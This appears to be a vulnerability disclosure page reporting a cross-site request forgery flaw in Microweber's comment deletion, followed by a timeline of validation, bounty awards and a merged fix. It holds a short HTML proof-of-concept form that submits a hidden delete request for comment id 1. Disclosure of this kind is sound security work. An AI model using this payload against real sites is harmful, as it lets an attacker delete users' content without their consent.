Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on

Oct 22nd 2021


Hello Microweber team

I found a CSRF on deleting the comments :


  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />

after you run this PoC.html you can see that the comment with id 1 will be deleted.

We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 2cdf57 a year ago
Peter Ivanov has been awarded the fix bounty
manage.php#L1-L11 has been validated
Model.php#L1-L63 has been validated
functions.php#L1-L200 has been validated
admin.php#L1-L18 has been validated
Api.php#L1-L241 has been validated
view.php#L1-L57 has been validated
Controller.php#L1-L32 has been validated
to join this conversation